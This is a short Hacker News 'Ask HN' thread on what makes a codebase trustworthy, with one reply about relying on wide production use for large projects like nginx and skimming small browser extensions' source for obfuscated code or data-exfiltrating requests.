
Ask HN: What makes you trust a codebase? - megous
I sometimes find it hard to trust other people&#x27;s code. For example, recently I wanted to know how configuration file affects request processing in nginx. That was no fun at all. Software engineers trust nginx and deploy it a lot, yet they probably wouldn&#x27;t be able to chart out the internal structure of it off the cuff.<p>It is said that many eyeballs eyeballing the code over time makes it more trustworthy. But do these eyeballs look for that inspires trust?<p>(I&#x27;m not meaning to single out nginx, it was just at the top of my mind as an example.)
======
chatmasta
Depends on the type of project. For something as big as nginx, unless you're a
professional source code auditor with a lot of time, you pretty much need to
rely on the "many eyeballs eyeballing the code." If big companies are using
the product in production, you can bet many edge cases have been tested, bugs
found and resolved.

For smaller stuff, what comes to mind is chrome extensions. Whenever I install
some sketchy looking chrome extension like "user agent switcher" that requests
permission to work on every URL, I always check the source code of the
extension for any code that might exfiltrate data to external sources. Usually
the source code is minimal and this only takes a few minutes. I do a quick
scan for any code that is suspiciously obfuscated or seems to make an
XHTTPRequest to a sketchy site, and if I see anything like that I "nope" right
out of there.

It also comes down to what your threat model is and what you're trying to
protect yourself from. If you know that, then you have an idea of what
specifically to look for.

